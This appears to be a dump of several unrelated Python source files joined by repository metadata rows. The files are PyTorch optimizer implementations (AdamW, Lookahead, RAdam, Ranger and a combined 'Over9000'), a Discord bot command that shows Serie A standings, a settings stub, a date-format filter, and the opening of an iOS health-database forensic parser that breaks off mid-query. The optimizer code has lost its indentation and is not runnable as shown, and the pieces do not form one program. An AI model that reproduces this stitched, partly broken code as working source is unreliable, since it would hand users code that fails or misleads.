if group['weight_decay'] != 0:
decayed_weights = torch.mul(p.data, group['weight_decay'])
p.data.add_(-step_size)
p.data.sub_(decayed_weights)
else:
p.data.add_(-step_size)
return loss
class AdamW(Optimizer):
r"""Implements AdamW algorithm.
The original Adam algorithm was proposed in `Adam: A Method for Stochastic Optimization`_.
The AdamW variant was proposed in `Decoupled Weight Decay Regularization`_.
Arguments:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float, optional): learning rate (default: 1e-3)
betas (Tuple[float, float], optional): coefficients used for computing
running averages of gradient and its square (default: (0.9, 0.999))
eps (float, optional): term added to the denominator to improve
numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay coefficient (default: 1e-2)
amsgrad (boolean, optional): whether to use the AMSGrad variant of this
algorithm from the paper `On the Convergence of Adam and Beyond`_
(default: False)
.. _Adam\: A Method for Stochastic Optimization:
https://arxiv.org/abs/1412.6980
.. _Decoupled Weight Decay Regularization:
https://arxiv.org/abs/1711.05101
.. _On the Convergence of Adam and Beyond:
https://openreview.net/forum?id=ryQu7f-RZ
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8,
weight_decay=1e-2, amsgrad=False):
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
defaults = dict(lr=lr, betas=betas, eps=eps,
weight_decay=weight_decay, amsgrad=amsgrad)
super(AdamW, self).__init__(params, defaults)
def __setstate__(self, state):
super(AdamW, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('amsgrad', False)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
                # Perform decoupled weight decay on the parameter itself
p.data.mul_(1 - group['lr'] * group['weight_decay'])
# Perform optimization step
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError('Adam does not support sparse gradients, please consider SparseAdam instead')
amsgrad = group['amsgrad']
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(p.data)
if amsgrad:
# Maintains max of all exp. moving avg. of sq. grad. values
state['max_exp_avg_sq'] = torch.zeros_like(p.data)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
if amsgrad:
max_exp_avg_sq = state['max_exp_avg_sq']
beta1, beta2 = group['betas']
state['step'] += 1
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(1 - beta1, grad)
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
if amsgrad:
# Maintains the maximum of all 2nd moment running avg. till now
torch.max(max_exp_avg_sq, exp_avg_sq, out=max_exp_avg_sq)
# Use the max. for normalizing running avg. of gradient
denom = max_exp_avg_sq.sqrt().add_(group['eps'])
else:
denom = exp_avg_sq.sqrt().add_(group['eps'])
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
step_size = group['lr'] * math.sqrt(bias_correction2) / bias_correction1
p.data.addcdiv_(-step_size, exp_avg, denom)
return loss
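The decoupled decay in `AdamW.step` above multiplies the weights by `(1 - lr * weight_decay)` before the Adam update, rather than folding the decay into the gradient. A scalar sketch of the difference (illustrative numbers; the two coincide under plain SGD but diverge once Adam rescales the gradient):

```python
def l2_coupled(p, grad, lr, wd):
    # Classic L2 penalty: the decay enters the gradient (and, in Adam,
    # the moment estimates too).
    return p - lr * (grad + wd * p)

def decoupled(p, grad, lr, wd):
    # AdamW-style: decay applied directly to the weight, gradient untouched.
    return p * (1 - lr * wd) - lr * grad

# With a plain SGD step the two formulations give the same result.
assert abs(l2_coupled(1.0, 0.5, 0.1, 0.01) - decoupled(1.0, 0.5, 0.1, 0.01)) < 1e-12
```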
class Lookahead(Optimizer):
    def __init__(self, base_optimizer, alpha=0.5, k=6):
if not 0.0 <= alpha <= 1.0:
raise ValueError(f'Invalid slow update rate: {alpha}')
if not 1 <= k:
raise ValueError(f'Invalid lookahead steps: {k}')
self.optimizer = base_optimizer
self.param_groups = self.optimizer.param_groups
self.alpha = alpha
self.k = k
for group in self.param_groups:
group["step_counter"] = 0
self.slow_weights = [[p.clone().detach() for p in group['params']]
for group in self.param_groups]
for w in it.chain(*self.slow_weights):
w.requires_grad = False
def step(self, closure=None):
loss = None
if closure is not None:
loss = closure()
loss = self.optimizer.step()
for group,slow_weights in zip(self.param_groups,self.slow_weights):
group['step_counter'] += 1
if group['step_counter'] % self.k != 0:
continue
for p,q in zip(group['params'],slow_weights):
if p.grad is None:
continue
q.data.add_(self.alpha,p.data - q.data)
p.data.copy_(q.data)
return loss
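`Lookahead` above keeps a slow copy of each weight and, every `k` fast steps, pulls it toward the fast weights and resets the fast weights onto it. A scalar sketch of that interpolation (values are illustrative):

```python
def lookahead_update(slow, fast, alpha):
    # slow <- slow + alpha * (fast - slow); fast is then reset onto slow,
    # mirroring the q.data.add_ / p.data.copy_ pair in Lookahead.step.
    slow = slow + alpha * (fast - slow)
    return slow, slow

# One interpolation: the slow weights move halfway toward the fast weights.
assert lookahead_update(0.0, 1.0, 0.5) == (0.5, 0.5)
```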
# Lookahead implementation from https://github.com/lonePatient/lookahead_pytorch/blob/master/optimizer.py
# RAdam + LARS implementation from https://gist.github.com/redknightlois/c4023d393eb8f92bb44b2ab582d7ec20
# RAdam + LARS + LookAHead
class Over9000(Optimizer):
def __init__(self, params, lr=1e-3, alpha=0.5, k=6, betas=(0.9, 0.999), eps=1e-8, weight_decay=0):
#parameter checks
if not 0.0 <= alpha <= 1.0:
raise ValueError(f'Invalid slow update rate: {alpha}')
if not 1 <= k:
raise ValueError(f'Invalid lookahead steps: {k}')
if not lr > 0:
raise ValueError(f'Invalid Learning Rate: {lr}')
if not eps > 0:
raise ValueError(f'Invalid eps: {eps}')
defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay)
self.buffer = [[None, None, None] for ind in range(10)]
super(Over9000, self).__init__(params, defaults)
        # lookahead params
for group in self.param_groups:
group["step_counter"] = 0
self.alpha = alpha
self.k = k
#lookahead weights
self.slow_weights = [[p.clone().detach() for p in group['params']]
for group in self.param_groups]
#don't use grad for lookahead weights
for w in it.chain(*self.slow_weights):
w.requires_grad = False
def __setstate__(self, state):
super(Over9000, self).__setstate__(state)
def step(self, closure=None):
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data.float()
if grad.is_sparse:
raise RuntimeError('Ralamb does not support sparse gradients')
p_data_fp32 = p.data.float()
state = self.state[p]
if len(state) == 0:
state['step'] = 0
state['exp_avg'] = torch.zeros_like(p_data_fp32)
state['exp_avg_sq'] = torch.zeros_like(p_data_fp32)
else:
state['exp_avg'] = state['exp_avg'].type_as(p_data_fp32)
state['exp_avg_sq'] = state['exp_avg_sq'].type_as(p_data_fp32)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
beta1, beta2 = group['betas']
# Decay the first and second moment running average coefficient
# m_t
exp_avg.mul_(beta1).add_(1 - beta1, grad)
# v_t
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
state['step'] += 1
buffered = self.buffer[int(state['step'] % 10)]
if state['step'] == buffered[0]:
N_sma, radam_step = buffered[1], buffered[2]
else:
buffered[0] = state['step']
beta2_t = beta2 ** state['step']
N_sma_max = 2 / (1 - beta2) - 1
N_sma = N_sma_max - 2 * state['step'] * beta2_t / (1 - beta2_t)
buffered[1] = N_sma
# more conservative since it's an approximated value
if N_sma >= 5:
radam_step = group['lr'] * math.sqrt((1 - beta2_t) * (N_sma - 4) / (N_sma_max - 4) * (N_sma - 2) / N_sma * N_sma_max / (N_sma_max - 2)) / (1 - beta1 ** state['step'])
else:
radam_step = group['lr'] / (1 - beta1 ** state['step'])
buffered[2] = radam_step
if group['weight_decay'] != 0:
p_data_fp32.add_(-group['weight_decay'] * group['lr'], p_data_fp32)
weight_norm = p.data.pow(2).sum().sqrt().clamp(0, 10)
radam_norm = p_data_fp32.pow(2).sum().sqrt()
if weight_norm == 0 or radam_norm == 0:
trust_ratio = 1
else:
trust_ratio = weight_norm / radam_norm
state['weight_norm'] = weight_norm
state['adam_norm'] = radam_norm
state['trust_ratio'] = trust_ratio
# more conservative since it's an approximated value
if N_sma >= 5:
denom = exp_avg_sq.sqrt().add_(group['eps'])
p_data_fp32.addcdiv_(-radam_step * trust_ratio, exp_avg, denom)
else:
p_data_fp32.add_(-radam_step * trust_ratio, exp_avg)
p.data.copy_(p_data_fp32)
#---------------- end radam step
#look ahead tracking and updating if latest batch = k
for group,slow_weights in zip(self.param_groups,self.slow_weights):
group['step_counter'] += 1
if group['step_counter'] % self.k != 0:
continue
for p,q in zip(group['params'],slow_weights):
if p.grad is None:
continue
q.data.add_(self.alpha,p.data - q.data)
p.data.copy_(q.data)
return loss
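`Over9000` layers a LARS-style trust ratio on top of the rectified Adam step: the update is rescaled by a ratio of norms, with the weight norm clamped and a fallback of 1 when either norm is zero. A scalar sketch of that ratio (hypothetical norm values):

```python
def trust_ratio(weight_norm, radam_norm, cap=10.0):
    # Mirrors the clamp(0, 10) and the zero-norm fallback in Over9000.step.
    weight_norm = min(max(weight_norm, 0.0), cap)
    if weight_norm == 0 or radam_norm == 0:
        return 1.0
    return weight_norm / radam_norm

assert trust_ratio(5.0, 2.5) == 2.0
assert trust_ratio(0.0, 2.5) == 1.0     # zero norm: fall back to 1
assert trust_ratio(100.0, 5.0) == 2.0   # weight norm capped at 10
```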
class RAdam(torch.optim.Optimizer):
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=0):
defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay)
self.buffer = [[None, None, None] for ind in range(10)]
super(RAdam, self).__init__(params, defaults)
def __setstate__(self, state):
super(RAdam, self).__setstate__(state)
def step(self, closure=None):
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data.float()
if grad.is_sparse:
raise RuntimeError('RAdam does not support sparse gradients')
p_data_fp32 = p.data.float()
state = self.state[p]
if len(state) == 0:
state['step'] = 0
state['exp_avg'] = torch.zeros_like(p_data_fp32)
state['exp_avg_sq'] = torch.zeros_like(p_data_fp32)
else:
state['exp_avg'] = state['exp_avg'].type_as(p_data_fp32)
state['exp_avg_sq'] = state['exp_avg_sq'].type_as(p_data_fp32)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
beta1, beta2 = group['betas']
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
exp_avg.mul_(beta1).add_(1 - beta1, grad)
state['step'] += 1
buffered = self.buffer[int(state['step'] % 10)]
if state['step'] == buffered[0]:
N_sma, step_size = buffered[1], buffered[2]
else:
buffered[0] = state['step']
beta2_t = beta2 ** state['step']
N_sma_max = 2 / (1 - beta2) - 1
N_sma = N_sma_max - 2 * state['step'] * beta2_t / (1 - beta2_t)
buffered[1] = N_sma
# more conservative since it's an approximated value
if N_sma >= 5:
step_size = group['lr'] * math.sqrt((1 - beta2_t) * (N_sma - 4) / (N_sma_max - 4) * (N_sma - 2) / N_sma * N_sma_max / (N_sma_max - 2)) / (1 - beta1 ** state['step'])
else:
step_size = group['lr'] / (1 - beta1 ** state['step'])
buffered[2] = step_size
if group['weight_decay'] != 0:
p_data_fp32.add_(-group['weight_decay'] * group['lr'], p_data_fp32)
# more conservative since it's an approximated value
if N_sma >= 5:
denom = exp_avg_sq.sqrt().add_(group['eps'])
p_data_fp32.addcdiv_(-step_size, exp_avg, denom)
else:
p_data_fp32.add_(-step_size, exp_avg)
p.data.copy_(p_data_fp32)
return loss
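RAdam's `N_sma` quantity above estimates the length of the simple moving average of the adaptive learning rate; while it sits below the threshold (5 here), the variance rectification is skipped and a plain momentum step is taken. A sketch of how that schedule evolves over the first steps:

```python
def n_sma(step, beta2=0.999):
    # Same formula as the buffered computation in RAdam.step.
    beta2_t = beta2 ** step
    n_max = 2 / (1 - beta2) - 1
    return n_max - 2 * step * beta2_t / (1 - beta2_t)

# The earliest steps fall below the threshold, so RAdam warms up with
# un-rectified (SGD-with-momentum-like) steps before switching to Adam-like ones.
assert n_sma(1) < 5
assert n_sma(10) > 5
```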
import math
import torch
from torch.optim.optimizer import Optimizer, required
import itertools as it
#from torch.optim import Optimizer
#credit - Lookahead implementation from LonePatient - https://github.com/lonePatient/lookahead_pytorch/blob/master/optimizer.py
#credit2 - RAdam code by https://github.com/LiyuanLucasLiu/RAdam/blob/master/radam.py
class Ranger(Optimizer):
def __init__(self, params, lr=1e-3, alpha=0.5, k=6, betas=(.9,0.999), eps=1e-8, weight_decay=0):
#parameter checks
if not 0.0 <= alpha <= 1.0:
raise ValueError(f'Invalid slow update rate: {alpha}')
if not 1 <= k:
raise ValueError(f'Invalid lookahead steps: {k}')
if not lr > 0:
raise ValueError(f'Invalid Learning Rate: {lr}')
if not eps > 0:
raise ValueError(f'Invalid eps: {eps}')
#prep defaults and init torch.optim base
defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay)
super().__init__(params,defaults)
#now we can get to work...
for group in self.param_groups:
group["step_counter"] = 0
#print("group step counter init")
#look ahead params
self.alpha = alpha
self.k = k
#radam buffer for state
self.radam_buffer = [[None,None,None] for ind in range(10)]
#lookahead weights
self.slow_weights = [[p.clone().detach() for p in group['params']]
for group in self.param_groups]
#don't use grad for lookahead weights
for w in it.chain(*self.slow_weights):
w.requires_grad = False
def __setstate__(self, state):
print("set state called")
super(Ranger, self).__setstate__(state)
def step(self, closure=None):
loss = None
#note - below is commented out b/c I have other work that passes back the loss as a float, and thus not a callable closure.
#Uncomment if you need to use the actual closure...
#if closure is not None:
#loss = closure()
#------------ radam
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data.float()
if grad.is_sparse:
raise RuntimeError('RAdam does not support sparse gradients')
p_data_fp32 = p.data.float()
state = self.state[p]
if len(state) == 0:
state['step'] = 0
state['exp_avg'] = torch.zeros_like(p_data_fp32)
state['exp_avg_sq'] = torch.zeros_like(p_data_fp32)
else:
state['exp_avg'] = state['exp_avg'].type_as(p_data_fp32)
state['exp_avg_sq'] = state['exp_avg_sq'].type_as(p_data_fp32)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
beta1, beta2 = group['betas']
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
exp_avg.mul_(beta1).add_(1 - beta1, grad)
state['step'] += 1
buffered = self.radam_buffer[int(state['step'] % 10)]
if state['step'] == buffered[0]:
N_sma, step_size = buffered[1], buffered[2]
else:
buffered[0] = state['step']
beta2_t = beta2 ** state['step']
N_sma_max = 2 / (1 - beta2) - 1
N_sma = N_sma_max - 2 * state['step'] * beta2_t / (1 - beta2_t)
buffered[1] = N_sma
if N_sma > 5:
step_size = group['lr'] * math.sqrt((1 - beta2_t) * (N_sma - 4) / (N_sma_max - 4) * (N_sma - 2) / N_sma * N_sma_max / (N_sma_max - 2)) / (1 - beta1 ** state['step'])
else:
step_size = group['lr'] / (1 - beta1 ** state['step'])
buffered[2] = step_size
if group['weight_decay'] != 0:
p_data_fp32.add_(-group['weight_decay'] * group['lr'], p_data_fp32)
if N_sma > 5:
denom = exp_avg_sq.sqrt().add_(group['eps'])
p_data_fp32.addcdiv_(-step_size, exp_avg, denom)
else:
p_data_fp32.add_(-step_size, exp_avg)
p.data.copy_(p_data_fp32)
#---------------- end radam step
#look ahead tracking and updating if latest batch = k
for group,slow_weights in zip(self.param_groups,self.slow_weights):
group['step_counter'] += 1
if group['step_counter'] % self.k != 0:
continue
for p,q in zip(group['params'],slow_weights):
if p.grad is None:
continue
q.data.add_(self.alpha,p.data - q.data)
p.data.copy_(q.data)
return loss | 42.688187 | 190 | 0.542395 | 3,817 | 31,077 | 4.235525 | 0.084359 | 0.035628 | 0.028206 | 0.008227 | 0.887796 | 0.877281 | 0.863549 | 0.857549 | 0.8479 | 0.836766 | 0 | 0.02783 | 0.351353 | 31,077 | 728 | 191 | 42.688187 | 0.774184 | 0.206294 | 0 | 0.87033 | 0 | 0 | 0.090471 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043956 | false | 0 | 0.017582 | 0 | 0.092308 | 0.002198 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
24af655686e7fc5daa5b027b80f2d4b37aa03e8c | 3,346 | py | Python | commands/results/standings.py | PyGera/fantacalcio-bot | bf9f8aba45d8c21b22255267764077d443e3ee10 | [
"MIT"
] | 2 | 2021-10-08T23:14:23.000Z | 2021-11-01T15:34:21.000Z | commands/results/standings.py | PyGera/fantacalcio-bot | bf9f8aba45d8c21b22255267764077d443e3ee10 | [
"MIT"
] | 1 | 2021-10-17T00:16:06.000Z | 2021-10-17T00:16:06.000Z | commands/results/standings.py | PyGera/fantacalcio-bot | bf9f8aba45d8c21b22255267764077d443e3ee10 | [
"MIT"
] | null | null | null | import discord
import requests
async def standings(ctx, client, FOOTBALL_API_HEADERS):
params = (
("season_id","2100"),
)
standing_req = requests.get('https://app.sportdataapi.com/api/v1/soccer/standings', headers=FOOTBALL_API_HEADERS, params=params).json()
embedVar = discord.Embed(
title="Classifica Serie A TIM",
color=0x00197d
)
embedVar.set_thumbnail(url="https://www.legaseriea.it/assets/legaseriea/images/logo_main_seriea.png?v=34")
for team in standing_req['data']['standings']:
team_data = {}
params = (
("country_id", "62"),
)
teams_req = requests.get(f'https://app.sportdataapi.com/api/v1/soccer/teams/{team["team_id"]}', headers=FOOTBALL_API_HEADERS, params=params).json()
team_data = teams_req['data']
logo_stand = ''
if team['position'] == 1:
logo_stand = 'scudetto'
elif team['result'] == 'Champions League':
logo_stand = 'champions'
elif team['result'] == 'Europa League':
logo_stand = 'europa'
elif team['result'] == 'Conference League Qualification':
logo_stand = 'conference'
elif team['result'] == 'Relegation':
logo_stand = 'serieb'
embedVar.add_field(name='\u200b', value=f"**{team['position']} {str(discord.utils.get(client.emojis, name=team_data['short_code']))} {team_data['name']} ** {team['points']} {str(discord.utils.get(client.emojis, name=logo_stand)) if logo_stand != '' else ''}", inline=False)
message = await ctx.reply(embed=embedVar, mention_author=False)
emojis = ["🔁"]
for emoji in emojis:
await message.add_reaction(emoji)
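Both `standings` and `standings_now` repeat the same position/result-to-badge `if`/`elif` chain; a table-driven helper would keep the two in sync. An illustrative refactor sketch (the helper name and table are hypothetical, not part of the bot):

```python
RESULT_BADGES = {
    'Champions League': 'champions',
    'Europa League': 'europa',
    'Conference League Qualification': 'conference',
    'Relegation': 'serieb',
}

def badge_for(position, result):
    # First place always gets the scudetto, regardless of `result`.
    if position == 1:
        return 'scudetto'
    return RESULT_BADGES.get(result, '')
```

Each function could then call `badge_for(team['position'], team['result'])` instead of duplicating the chain.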
async def standings_now(message, client, FOOTBALL_API_HEADERS):
params = (
("season_id","2100"),
)
standing_req = requests.get('https://app.sportdataapi.com/api/v1/soccer/standings', headers=FOOTBALL_API_HEADERS, params=params).json()
embedVar = discord.Embed(
title="Classifica Serie A TIM",
color=0x00197d
)
embedVar.set_thumbnail(url="https://www.legaseriea.it/assets/legaseriea/images/logo_main_seriea.png?v=34")
for team in standing_req['data']['standings']:
team_data = {}
params = (
("country_id", "62"),
)
teams_req = requests.get(f'https://app.sportdataapi.com/api/v1/soccer/teams/{team["team_id"]}', headers=FOOTBALL_API_HEADERS, params=params).json()
team_data = teams_req['data']
logo_stand = ''
if team['position'] == 1:
logo_stand = 'scudetto'
elif team['result'] == 'Champions League':
logo_stand = 'champions'
elif team['result'] == 'Europa League':
logo_stand = 'europa'
elif team['result'] == 'Conference League Qualification':
logo_stand = 'conference'
elif team['result'] == 'Relegation':
logo_stand = 'serieb'
embedVar.add_field(name='\u200b', value=f"**{team['position']} {str(discord.utils.get(client.emojis, name=team_data['short_code']))} {team_data['name']} ** {team['points']} {str(discord.utils.get(client.emojis, name=logo_stand)) if logo_stand != '' else ''}", inline=False)
message = await message.edit(embed=embedVar, mention_author=False)
| 34.854167 | 282 | 0.621339 | 394 | 3,346 | 5.116751 | 0.238579 | 0.071429 | 0.055556 | 0.071429 | 0.928571 | 0.897817 | 0.897817 | 0.897817 | 0.897817 | 0.897817 | 0 | 0.015367 | 0.222056 | 3,346 | 95 | 283 | 35.221053 | 0.75874 | 0 | 0 | 0.769231 | 0 | 0.061538 | 0.371488 | 0.062762 | 0 | 0 | 0.004782 | 0 | 0 | 1 | 0 | false | 0 | 0.030769 | 0 | 0.030769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
70147bd744f1cac8ecfdd7a22ac758539e6dd2b1 | 157 | py | Python | redtrics/core/filters.py | Redmart/redtrics | 3af32593faebe543a89f922cd3b53d1e594cc586 | [
"MIT"
] | 2 | 2016-05-05T15:27:06.000Z | 2016-05-06T07:29:44.000Z | redtrics/core/filters.py | Redmart/redtrics | 3af32593faebe543a89f922cd3b53d1e594cc586 | [
"MIT"
] | null | null | null | redtrics/core/filters.py | Redmart/redtrics | 3af32593faebe543a89f922cd3b53d1e594cc586 | [
"MIT"
] | 1 | 2020-03-03T07:41:03.000Z | 2020-03-03T07:41:03.000Z | # -*- coding: utf-8 -*-
from babel import dates
def format_datetime(value, format='medium'):
return dates.format_datetime(value, format, locale='en')
| 19.625 | 60 | 0.700637 | 21 | 157 | 5.142857 | 0.714286 | 0.259259 | 0.351852 | 0.462963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007463 | 0.146497 | 157 | 7 | 61 | 22.428571 | 0.798507 | 0.133758 | 0 | 0 | 0 | 0 | 0.059701 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 8 |
568fc4f691f5945800b3e9998615293e9cc29761 | 536 | py | Python | libotp/settings/Settings.py | AnonymousDeveloper65535/open-toontown | 3d05c22a7d960ad843dde231140447c46973dba5 | [
"BSD-3-Clause"
] | 1 | 2019-11-23T21:54:23.000Z | 2019-11-23T21:54:23.000Z | libotp/settings/Settings.py | AnonymousDeveloper65535/open-toontown | 3d05c22a7d960ad843dde231140447c46973dba5 | [
"BSD-3-Clause"
] | null | null | null | libotp/settings/Settings.py | AnonymousDeveloper65535/open-toontown | 3d05c22a7d960ad843dde231140447c46973dba5 | [
"BSD-3-Clause"
] | null | null | null | class Settings:
    GL = 0
    DX7 = 1
    DX8 = 5

    @staticmethod
    def readSettings():
        pass  # todo

    @staticmethod
    def getWindowedMode():
        return 1

    @staticmethod
    def getMusic():
        return 1

    @staticmethod
    def getSfx():
        return 1

    @staticmethod
    def getToonChatSounds():
        return 1

    @staticmethod
    def getMusicVolume():
        return 1

    @staticmethod
    def getSfxVolume():
        return 1

    @staticmethod
    def getResolution():
        return 1
| 14.486486 | 28 | 0.55597 | 48 | 536 | 6.208333 | 0.4375 | 0.402685 | 0.38255 | 0.442953 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035821 | 0.375 | 536 | 36 | 29 | 14.888889 | 0.853731 | 0.007463 | 0 | 0.535714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027778 | 0 | 1 | 0.285714 | false | 0.035714 | 0 | 0.25 | 0.678571 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
3b1f2b34667815a386eab1ab9c6dea6a366a463b | 22,160 | py | Python | scripts/artifacts/healthAll.py | rathbuna/iLEAPP | 391ddfab2257875fdf8181c84eb29a4992b60af7 | [
"MIT"
] | 2 | 2021-02-09T21:46:14.000Z | 2021-06-14T12:26:55.000Z | scripts/artifacts/healthAll.py | rathbuna/iLEAPP | 391ddfab2257875fdf8181c84eb29a4992b60af7 | [
"MIT"
] | null | null | null | scripts/artifacts/healthAll.py | rathbuna/iLEAPP | 391ddfab2257875fdf8181c84eb29a4992b60af7 | [
"MIT"
] | 1 | 2020-12-11T10:07:28.000Z | 2020-12-11T10:07:28.000Z | import glob
import os
import pathlib
import plistlib
import sqlite3
import json
import textwrap
import scripts.artifacts.artGlobals
from packaging import version
from scripts.artifact_report import ArtifactHtmlReport
from scripts.ilapfuncs import logfunc, tsv, timeline, is_platform_windows
from scripts.ccl import ccl_bplist
from scripts.parse3 import ParseProto
def get_healthAll(files_found, report_folder, seeker):
    file_found = str(files_found[0])
    db = sqlite3.connect(file_found)
    iOSversion = scripts.artifacts.artGlobals.versionf

    if version.parse(iOSversion) >= version.parse("12"):
        cursor = db.cursor()
        cursor.execute('''
        SELECT
            DATETIME(SAMPLES.START_DATE + 978307200, 'UNIXEPOCH') AS "START DATE",
            DATETIME(SAMPLES.END_DATE + 978307200, 'UNIXEPOCH') AS "END DATE",
            METADATA_VALUES.NUMERICAL_VALUE AS "SPM (strides/min)",
            CASE WORKOUTS.ACTIVITY_TYPE
                WHEN 63 THEN "HIGH INTENSITY INTERVAL TRAINING (HIIT)"
                WHEN 37 THEN "INDOOR / OUTDOOR RUN"
                WHEN 3000 THEN "OTHER"
                WHEN 52 THEN "INDOOR / OUTDOOR WALK"
                WHEN 20 THEN "FUNCTIONAL TRAINING"
                WHEN 13 THEN "INDOOR CYCLE"
                WHEN 16 THEN "ELLIPTICAL"
                WHEN 35 THEN "ROWER"
                ELSE "UNKNOWN" || "-" || WORKOUTS.ACTIVITY_TYPE
            END "WORKOUT TYPE",
            WORKOUTS.DURATION / 60.00 AS "DURATION (IN MINUTES)",
            WORKOUTS.TOTAL_ENERGY_BURNED AS "CALORIES BURNED",
            WORKOUTS.TOTAL_DISTANCE AS "DISTANCE IN KILOMETERS",
            WORKOUTS.TOTAL_DISTANCE*0.621371 AS "DISTANCE IN MILES",
            WORKOUTS.TOTAL_BASAL_ENERGY_BURNED AS "TOTAL BASAL ENERGY BURNED",
            CASE WORKOUTS.GOAL_TYPE
                WHEN 2 THEN "MINUTES"
                WHEN 0 THEN "OPEN"
            END "GOAL TYPE",
            WORKOUTS.GOAL AS "GOAL",
            WORKOUTS.TOTAL_FLIGHTS_CLIMBED AS "FLIGHTS CLIMBED",
            WORKOUTS.TOTAL_W_STEPS AS "STEPS"
        FROM
            SAMPLES
        LEFT OUTER JOIN
            METADATA_VALUES
            ON METADATA_VALUES.OBJECT_ID = SAMPLES.DATA_ID
        LEFT OUTER JOIN
            METADATA_KEYS
            ON METADATA_KEYS.ROWID = METADATA_VALUES.KEY_ID
        LEFT OUTER JOIN
            WORKOUTS
            ON WORKOUTS.DATA_ID = SAMPLES.DATA_ID
        WHERE
            WORKOUTS.ACTIVITY_TYPE NOT NULL AND KEY IS "_HKPrivateWorkoutAverageCadence"
        ''')

        all_rows = cursor.fetchall()
        usageentries = len(all_rows)
        if usageentries > 0:
            data_list = []
            for row in all_rows:
                data_list.append((row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8], row[9], row[10], row[11], row[12]))

            report = ArtifactHtmlReport('Health Workout Cadence')
            report.start_artifact_report(report_folder, 'Workout Cadence')
            report.add_script()
            data_headers = ('Start Date', 'End Date', 'Strides per Min.', 'Workout Type', 'Duration in Mins.', 'Calories Burned', 'Distance in KM', 'Distance in Miles', 'Total Basal Energy', 'Goal Type', 'Goal', 'Flights Climbed', 'Steps')
            report.write_artifact_data_table(data_headers, data_list, file_found)
            report.end_artifact_report()

            tsvname = 'Health Workout Cadence'
            tsv(report_folder, data_headers, data_list, tsvname)

            tlactivity = 'Health Workout Cadence'
            timeline(report_folder, tlactivity, data_list)
        else:
            logfunc('No data available in Workout Cadence')
    if version.parse(iOSversion) >= version.parse("9"):
        cursor = db.cursor()
        cursor.execute(
            """
            SELECT
                DATETIME(SAMPLES.START_DATE + 978307200, 'UNIXEPOCH') AS "START DATE",
                DATETIME(SAMPLES.END_DATE + 978307200, 'UNIXEPOCH') AS "END DATE",
                QUANTITY AS "DISTANCE IN METERS",
                QUANTITY*3.28084 AS "DISTANCE IN FEET",
                (SAMPLES.END_DATE-SAMPLES.START_DATE) AS "TIME IN SECONDS",
                SAMPLES.DATA_ID AS "SAMPLES TABLE ID"
            FROM
                SAMPLES
            LEFT OUTER JOIN
                QUANTITY_SAMPLES
